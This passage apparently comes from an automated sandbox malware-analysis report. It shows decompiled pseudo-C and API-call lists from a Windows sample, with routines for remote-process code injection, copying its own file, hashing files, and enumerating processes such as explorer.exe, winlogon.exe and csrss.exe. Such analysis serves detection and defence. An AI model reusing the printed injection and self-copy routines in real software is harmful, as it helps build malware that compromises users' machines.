                                                                                                        0x00402b15
                                                                                                        0x00402b17
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b19
                                                                                                        0x00402b1c
                                                                                                        0x00402b88
                                                                                                        0x00402b8b
                                                                                                        0x00402b90
                                                                                                        0x00402b93
                                                                                                        0x00402b99
                                                                                                        0x00402b99
                                                                                                        0x00402b9c
                                                                                                        0x00402ba0
                                                                                                        0x00402ba7
                                                                                                        0x00402baa
                                                                                                        0x00402bad
                                                                                                        0x00402bb0
                                                                                                        0x00402bb0
                                                                                                        0x00402bb3
                                                                                                        0x00402bb3
                                                                                                        0x00402bb6
                                                                                                        0x00402bb9
                                                                                                        0x00402bbc
                                                                                                        0x00402bc1
                                                                                                        0x00402bc6
                                                                                                        0x00402bc6
                                                                                                        0x00402bc8
                                                                                                        0x00402bca
                                                                                                        0x00402bd0
                                                                                                        0x00402bd0
                                                                                                        0x00402bd5
                                                                                                        0x00402bd8
                                                                                                        0x00402be3
                                                                                                        0x00402be8
                                                                                                        0x00402be8
                                                                                                        0x00402be8
                                                                                                        0x00402be8
                                                                                                        0x00402beb
                                                                                                        0x00402bec
                                                                                                        0x00402bec
                                                                                                        0x00402bf0
                                                                                                        0x00402bf0
                                                                                                        0x00402bc8
                                                                                                        0x00402bf3
                                                                                                        0x00402bf5
                                                                                                        0x00402bf5
                                                                                                        0x00402bfa
                                                                                                        0x00402bfd
                                                                                                        0x00402bfd
                                                                                                        0x00402c0a
                                                                                                        0x00402c10
                                                                                                        0x00402c12
                                                                                                        0x00000000
                                                                                                        0x00402c18
                                                                                                        0x00402c18
                                                                                                        0x00402c2f
                                                                                                        0x00402c35
                                                                                                        0x00402c37
                                                                                                        0x00000000
                                                                                                        0x00402c3d
                                                                                                        0x00402c48
                                                                                                        0x00402c4e
                                                                                                        0x00402c50
                                                                                                        0x00000000
                                                                                                        0x00402c56
                                                                                                        0x00402c75
                                                                                                        0x00402c7b
                                                                                                        0x00402c7d
                                                                                                        0x00000000
                                                                                                        0x00402c83
                                                                                                        0x00402c86
                                                                                                        0x00402c8f
                                                                                                        0x00402c94
                                                                                                        0x00402c9a
                                                                                                        0x00402c9f
                                                                                                        0x00402ca7
                                                                                                        0x00402ca7
                                                                                                        0x00402cac
                                                                                                        0x00402cae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402cb5
                                                                                                        0x00402cc0
                                                                                                        0x00402cc6
                                                                                                        0x00402ccb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402ccd
                                                                                                        0x00000000
                                                                                                        0x00402ccb
                                                                                                        0x00402cd4
                                                                                                        0x00402cd4
                                                                                                        0x00402cda
                                                                                                        0x00402ce0
                                                                                                        0x00402ce6
                                                                                                        0x00402ce8
                                                                                                        0x00000000
                                                                                                        0x00402cea
                                                                                                        0x00402ced
                                                                                                        0x00402d03
                                                                                                        0x00402d0c
                                                                                                        0x00402d1a
                                                                                                        0x00402d28
                                                                                                        0x00402d37
                                                                                                        0x00402d48
                                                                                                        0x00402d48
                                                                                                        0x00402ce8
                                                                                                        0x00402c7d
                                                                                                        0x00402c50
                                                                                                        0x00402c37
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b1e
                                                                                                        0x00402b26
                                                                                                        0x00402b28
                                                                                                        0x00402b2b
                                                                                                        0x00402b2e
                                                                                                        0x00402b30
                                                                                                        0x00000000
                                                                                                        0x00402b36
                                                                                                        0x00402b3b
                                                                                                        0x00402b3d
                                                                                                        0x00402b3f
                                                                                                        0x00402b41
                                                                                                        0x00402b44
                                                                                                        0x00402b46
                                                                                                        0x00000000
                                                                                                        0x00402b4c
                                                                                                        0x00402b4c
                                                                                                        0x00402b4e
                                                                                                        0x00402b50
                                                                                                        0x00402b80
                                                                                                        0x00402b83
                                                                                                        0x00000000
                                                                                                        0x00402b52
                                                                                                        0x00000000
                                                                                                        0x00402b52
                                                                                                        0x00402b52
                                                                                                        0x00402b5c
                                                                                                        0x00402b5c
                                                                                                        0x00402b54
                                                                                                        0x00402b54
                                                                                                        0x00402b54
                                                                                                        0x00402b60
                                                                                                        0x00402b66
                                                                                                        0x00402b68
                                                                                                        0x00402b6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b70
                                                                                                        0x00402b73
                                                                                                        0x00402b76
                                                                                                        0x00402b79
                                                                                                        0x00402b7c
                                                                                                        0x00402b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00402b7e
                                                                                                        0x00402b50
                                                                                                        0x00402b46
                                                                                                        0x00000000
                                                                                                        0x00402b30
                                                                                                        0x00402b0f
                                                                                                        0x00402af4
                                                                                                        0x00402aa0
                                                                                                        0x00402aa3
                                                                                                        0x00402aa8
                                                                                                        0x00402aad
                                                                                                        0x00000000
                                                                                                        0x00402aaf
                                                                                                        0x00402aaf
                                                                                                        0x00402ab2
                                                                                                        0x00000000
                                                                                                        0x00402ab2
                                                                                                        0x00402aad
                                                                                                        0x00402a9e
                                                                                                        0x00402a96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • RtlImageNtHeader.NTDLL(?), ref: 00402A2D
                                                                                                        • NtOpenProcess.NTDLL(00000000,001FFFFF,?,?), ref: 00402A8E
                                                                                                        • NtClose.NTDLL(00000000), ref: 00402AB2
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000040), ref: 00402AD4
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,00000000), ref: 00402AEA
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00402B60
                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C0A
                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000004), ref: 00402C2F
                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C48
                                                                                                        • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00402C75
                                                                                                        • NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402C94
                                                                                                        • Sleep.KERNELBASE(00000BB8), ref: 00402CB5
                                                                                                        • NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402CC0
                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 00402CD4
                                                                                                        • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00402CE0
                                                                                                        • NtClose.NTDLL(00000000), ref: 00402CED
                                                                                                        • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D03
                                                                                                        • NtClose.NTDLL(00000000), ref: 00402D0C
                                                                                                          • Part of subcall function 00408270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                          • Part of subcall function 00408270: GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D1A
                                                                                                        • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D37
                                                                                                        • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D5F
                                                                                                        • NtClose.NTDLL(00000000), ref: 00402D6D
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D82
                                                                                                        • NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402DA6
                                                                                                        • NtClose.NTDLL(00000000), ref: 00402DB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Memory$Free$Close$Thread$AddressAllocateObjectProcSingleWaitWrite$AllocCodeCreateExitHandleHeaderImageModuleOpenProcessSleepTerminateUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 4217436290-0
                                                                                                        • Opcode ID: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
                                                                                                        • Instruction ID: aa250f91bc0df1c709c0f0294cc1af27058bb64088126e2459afa89f473692c1
                                                                                                        • Opcode Fuzzy Hash: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
                                                                                                        • Instruction Fuzzy Hash: 53C14C71A01209EFDB20DF95DD49BEEBBB9FF04300F14406AE905B6290D775AE44DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406340, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 206nativefilememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E00406340(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				void* _v36;
				long _v40;
				long _v44;
				intOrPtr _v48;
				char* _v52;
				long _v56;
				void* _v60;
				long _v64;
				void* _v68;
				char _v76;
				char _v84;
				short _v1108;
				long _t59;
				long _t69;
				long* _t70;
				void* _t71;
				void* _t74;
				long _t83;
				signed int _t85;
				void* _t90;
				void* _t109;

				_v8 = 0;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v60 = 0;
				asm("movups [ebp-0x34], xmm0");
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v68 = 0;
				_v64 = 0;
				asm("movq [ebp-0x48], xmm0");
				asm("movq [ebp-0x50], xmm0");
				_t59 = GetModuleFileNameW(0,  &_v1108, 0x200);
				if(_t59 == 0 || _t59 == 0x200) {
					L6:
					return 0;
				} else {
					_push(0);
					_push(0);
					_push( &_v76);
					_push( &_v1108);
					if( *0x5d10b8() != 1) {
						goto L6;
					} else {
						_v60 = 0x18;
						_v52 =  &_v76;
						_v56 = 0;
						_v48 = 0x40;
						_v44 = 0;
						_v40 = 0;
						_t69 = NtCreateFile( &_v8, 0x120089,  &_v60,  &_v36,  &_v68, 0x80, 3, 1, 0x60, 0, 0); // executed
						if(_t69 != 0) {
							goto L6;
						} else {
							_t70 =  &_v28;
							__imp__GetFileSizeEx(_v8, _t70);
							if(_t70 != 0) {
								_t71 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
								_t109 = _t71;
								if(_t109 != 0) {
									_t74 =  *0x5d10bc(_v8, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, 0); // executed
									if(_t74 == 0) {
										NtClose(_v8); // executed
										_t104 = _a4;
										_push(0);
										_push(0);
										_push( &_v84);
										_push(_a4);
										if( *0x5d10b8() == 1) {
											_v60 = 0x18;
											_v52 =  &_v84;
											_v56 = 0;
											_v48 = 0x40;
											_v44 = 0;
											_v40 = 0;
											_t83 = NtCreateFile( &_v12, 0x120116,  &_v60,  &_v36,  &_v68, 0x80, 0, 0, 0x60, 0, 0); // executed
											if(_t83 != 0) {
												L16:
												VirtualFree(_t109, 0, 0x8000);
												_t85 = E00407ED0(_t104);
												asm("sbb eax, eax");
												return  ~( ~_t85);
											} else {
												_v20 = _t83;
												_v16 = _t83;
												_t90 =  *0x5d10c0(_v12, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, _t83); // executed
												_push(_v12);
												if(_t90 == 0) {
													NtClose();
													VirtualFree(_t109, 0, 0x8000); // executed
													return 1;
												} else {
													NtClose();
													goto L16;
												}
											}
										} else {
											VirtualFree(_t109, 0, 0x8000);
											return 0;
										}
									} else {
										NtClose(_v8);
										VirtualFree(_t109, 0, 0x8000);
										return 0;
									}
								} else {
									NtClose(_v8);
									return 0;
								}
							} else {
								NtClose(_v8);
								goto L6;
							}
						}
					}
				}
			}































                                                                                                        0x00406354
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406368
                                                                                                        0x0040636f
                                                                                                        0x00406373
                                                                                                        0x0040637a
                                                                                                        0x00406381
                                                                                                        0x00406388
                                                                                                        0x0040638f
                                                                                                        0x00406396
                                                                                                        0x0040639d
                                                                                                        0x004063a4
                                                                                                        0x004063ab
                                                                                                        0x004063b2
                                                                                                        0x004063b7
                                                                                                        0x004063bc
                                                                                                        0x004063c4
                                                                                                        0x0040645f
                                                                                                        0x00406464
                                                                                                        0x004063d5
                                                                                                        0x004063d5
                                                                                                        0x004063d7
                                                                                                        0x004063dc
                                                                                                        0x004063e3
                                                                                                        0x004063ec
                                                                                                        0x00000000
                                                                                                        0x004063ee
                                                                                                        0x00406400
                                                                                                        0x00406407
                                                                                                        0x00406411
                                                                                                        0x0040641c
                                                                                                        0x0040642c
                                                                                                        0x00406434
                                                                                                        0x0040643b
                                                                                                        0x00406443
                                                                                                        0x00000000
                                                                                                        0x00406445
                                                                                                        0x00406445
                                                                                                        0x0040644c
                                                                                                        0x00406454
                                                                                                        0x00406472
                                                                                                        0x00406478
                                                                                                        0x0040647c
                                                                                                        0x004064a5
                                                                                                        0x004064ad
                                                                                                        0x004064d1
                                                                                                        0x004064d7
                                                                                                        0x004064dd
                                                                                                        0x004064df
                                                                                                        0x004064e1
                                                                                                        0x004064e2
                                                                                                        0x004064eb
                                                                                                        0x00406515
                                                                                                        0x0040651c
                                                                                                        0x00406526
                                                                                                        0x00406531
                                                                                                        0x00406541
                                                                                                        0x00406549
                                                                                                        0x00406550
                                                                                                        0x00406558
                                                                                                        0x00406589
                                                                                                        0x00406591
                                                                                                        0x00406598
                                                                                                        0x004065a2
                                                                                                        0x004065ab
                                                                                                        0x0040655a
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00406576
                                                                                                        0x0040657c
                                                                                                        0x00406581
                                                                                                        0x004065ac
                                                                                                        0x004065ba
                                                                                                        0x004065ca
                                                                                                        0x00406583
                                                                                                        0x00406583
                                                                                                        0x00000000
                                                                                                        0x00406583
                                                                                                        0x00406581
                                                                                                        0x004064ed
                                                                                                        0x004064f5
                                                                                                        0x00406502
                                                                                                        0x00406502
                                                                                                        0x004064af
                                                                                                        0x004064b2
                                                                                                        0x004064c0
                                                                                                        0x004064cc
                                                                                                        0x004064cc
                                                                                                        0x0040647e
                                                                                                        0x00406481
                                                                                                        0x0040648d
                                                                                                        0x0040648d
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00406459
                                                                                                        0x00406454
                                                                                                        0x00406443
                                                                                                        0x004063ec

                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 004063BC
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 004063E4
                                                                                                        • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 0040643B
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0040644C
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406459
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?), ref: 00406472
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406481
                                                                                                        • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004064A5
                                                                                                        • NtClose.NTDLL(00000000), ref: 004064B2
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064C0
                                                                                                        • NtClose.NTDLL(00000000), ref: 004064D1
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 004064E3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064F5
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00406550
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406576
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406583
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00406591
                                                                                                        • NtClose.NTDLL(00000000), ref: 004065AC
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004065BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFile$Virtual$FreePath$Name$CreateName_$AllocModuleReadSizeWrite
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1655568127-2766056989
                                                                                                        • Opcode ID: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                        • Instruction ID: 2fd8ed99f3ae58de8391e8baf5aa5f6abea6aa1d3bd579213be14ba4813b3cc0
                                                                                                        • Opcode Fuzzy Hash: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                        • Instruction Fuzzy Hash: B4715A71A4121CBBEB209F90DC49BEEBBB8FB08704F100126F605F62D0D7B55A588B99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408B20, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152encryptionfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 35%
                                                                                                        			E00408B20(char _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				void* _t40;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x40aa14]");
				_t39 =  *0x40aa24; // 0x0
				_t1 =  &_a4; // 0x40363e
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t40 = CreateFileW( *_t1, 0x80000000, 1, 0, 3, 0x8000000, 0); // executed
				_t82 = _t40;
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000); // executed
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43); // executed
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??); // executed
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										FindCloseChangeNotification(_t82); // executed
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}

























                                                                                                        0x00408b29
                                                                                                        0x00408b30
                                                                                                        0x00408b48
                                                                                                        0x00408b4b
                                                                                                        0x00408b52
                                                                                                        0x00408b59
                                                                                                        0x00408b60
                                                                                                        0x00408b67
                                                                                                        0x00408b6b
                                                                                                        0x00408b6e
                                                                                                        0x00408b74
                                                                                                        0x00408b79
                                                                                                        0x00408b9b
                                                                                                        0x00408ba1
                                                                                                        0x00408b7b
                                                                                                        0x00408b86
                                                                                                        0x00408b8a
                                                                                                        0x00408b92
                                                                                                        0x00408ba2
                                                                                                        0x00408bb2
                                                                                                        0x00408bba
                                                                                                        0x00408bf0
                                                                                                        0x00408bf4
                                                                                                        0x00408c33
                                                                                                        0x00408c33
                                                                                                        0x00000000
                                                                                                        0x00408bf6
                                                                                                        0x00408bf6
                                                                                                        0x00408c00
                                                                                                        0x00408c00
                                                                                                        0x00408c05
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00408c14
                                                                                                        0x00408c16
                                                                                                        0x00408c1a
                                                                                                        0x00408c35
                                                                                                        0x00408c38
                                                                                                        0x00408c41
                                                                                                        0x00408c48
                                                                                                        0x00408c4e
                                                                                                        0x00408c56
                                                                                                        0x00408c1c
                                                                                                        0x00408c2d
                                                                                                        0x00408c31
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00408c31
                                                                                                        0x00000000
                                                                                                        0x00408c1a
                                                                                                        0x00408c59
                                                                                                        0x00000000
                                                                                                        0x00408c5b
                                                                                                        0x00408c60
                                                                                                        0x00408c68
                                                                                                        0x00408c71
                                                                                                        0x00408c79
                                                                                                        0x00000000
                                                                                                        0x00408c7b
                                                                                                        0x00408c7b
                                                                                                        0x00408c7e
                                                                                                        0x00408c82
                                                                                                        0x00408c84
                                                                                                        0x00408c87
                                                                                                        0x00408c90
                                                                                                        0x00408c90
                                                                                                        0x00408ca2
                                                                                                        0x00408caa
                                                                                                        0x00408cae
                                                                                                        0x00408caf
                                                                                                        0x00408c90
                                                                                                        0x00408cb6
                                                                                                        0x00408cc1
                                                                                                        0x00408cc8
                                                                                                        0x00408cd9
                                                                                                        0x00408cd9
                                                                                                        0x00408c79
                                                                                                        0x00408c59
                                                                                                        0x00408bbc
                                                                                                        0x00408bbd
                                                                                                        0x00408bc8
                                                                                                        0x00408bd4
                                                                                                        0x00408bd4
                                                                                                        0x00408b94
                                                                                                        0x00408b95
                                                                                                        0x00000000
                                                                                                        0x00408b95
                                                                                                        0x00408b92
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(>6@,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408B6E
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00408B8A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408B95
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00408BB2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408BBD
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00408BC8
                                                                                                        • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408BF0
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00408C14
                                                                                                        • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408C2D
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408C38
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408C41
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00408C48
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 00408C71
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408CB6
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408CC1
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00408CC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CloseContext$FileHandleRelease$CreateDestroyRead$AcquireChangeDataFindNotificationParam
                                                                                                        • String ID: >6@
                                                                                                        • API String ID: 2963825918-779403629
                                                                                                        • Opcode ID: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                        • Instruction ID: c20e288969fc02838bc95c2aa2b6e857bba7efe27eb6bc48cd55eb8ba344291c
                                                                                                        • Opcode Fuzzy Hash: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                        • Instruction Fuzzy Hash: 2751B271A01219BBEB209FA4DE45FEE7BB8EF48300F104075FA44B51E1DB75AE458B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004080E0, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130libraryprocessloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E004080E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t34;
				int _t37;
				struct HINSTANCE__* _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E00407EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t30 = CreateToolhelp32Snapshot(2, 0); // executed
					_t61 = _t30;
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308); // executed
						_t34 = E00408DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E00401740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E00401740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						_t37 = Process32Next(_v8,  &_v308); // executed
						if(_t37 != 0) {
							do {
								if(E00408DD0() == 0 || _t66 == 0) {
									L18:
									 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
									_t69 = _t69 + 1;
									if(_t69 < _a12) {
										goto L19;
									}
								} else {
									 *_t66(_v300,  &_a4); // executed
									if(_a4 == 0) {
										goto L19;
									} else {
										_t49 = E00401740("csrss.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t49 == 0) {
											goto L19;
										} else {
											_t51 = E00401740("winlogon.exe",  &_v272);
											_t72 = _t72 + 8;
											if(_t51 == 0) {
												goto L19;
											} else {
												goto L18;
											}
										}
									}
								}
								goto L20;
								L19:
								_t45 = Process32Next(_v8,  &_v308); // executed
							} while (_t45 != 0);
						}
						L20:
						FindCloseChangeNotification(_v8); // executed
						_t39 = _v12;
						if(_t39 != 0) {
							FreeLibrary(_t39);
						}
						return _t69;
					} else {
						return 0;
					}
				}
			}























                                                                                                        0x004080ed
                                                                                                        0x00408261
                                                                                                        0x004080f3
                                                                                                        0x004080f5
                                                                                                        0x004080f7
                                                                                                        0x00408104
                                                                                                        0x00408107
                                                                                                        0x0040810c
                                                                                                        0x0040810e
                                                                                                        0x00408114
                                                                                                        0x00408124
                                                                                                        0x00408126
                                                                                                        0x0040812c
                                                                                                        0x00408131
                                                                                                        0x0040813f
                                                                                                        0x0040813f
                                                                                                        0x00408149
                                                                                                        0x0040814e
                                                                                                        0x00408153
                                                                                                        0x00408158
                                                                                                        0x0040819f
                                                                                                        0x004081a5
                                                                                                        0x004081aa
                                                                                                        0x0040815e
                                                                                                        0x00408168
                                                                                                        0x0040816d
                                                                                                        0x0040817b
                                                                                                        0x00408180
                                                                                                        0x00408185
                                                                                                        0x00408193
                                                                                                        0x00408198
                                                                                                        0x0040819d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040819d
                                                                                                        0x00408185
                                                                                                        0x0040816d
                                                                                                        0x004081b6
                                                                                                        0x004081bd
                                                                                                        0x004081c0
                                                                                                        0x004081c7
                                                                                                        0x0040820f
                                                                                                        0x00408215
                                                                                                        0x00408218
                                                                                                        0x0040821c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004081cd
                                                                                                        0x004081d7
                                                                                                        0x004081dd
                                                                                                        0x00000000
                                                                                                        0x004081df
                                                                                                        0x004081eb
                                                                                                        0x004081f0
